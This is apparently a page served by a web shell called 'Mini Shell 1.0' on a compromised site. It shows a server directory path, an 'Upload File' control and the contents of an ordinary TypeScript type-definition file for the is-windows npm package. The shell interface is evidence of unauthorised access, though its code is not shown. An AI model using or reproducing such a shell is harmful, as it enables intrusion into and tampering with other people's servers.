HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/nodejs/@types/is-windows/
Upload File :
Current File : //proc/1991111/root/usr/share/nodejs/@types/is-windows/index.d.ts
// Type definitions for is-windows 1.0
// Project: https://github.com/jonschlinkert/is-windows
// Definitions by: Mizunashi Mana <https://github.com/mizunashi-mana>
//                 ExE Boss <https://github.com/ExE-Boss>
// Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped

/**
 * Returns `true` if the platform is windows.
 */
declare function isWindows(): boolean;

// Export CJS function
export = isWindows;

// Export UMD namespace
export as namespace isWindows;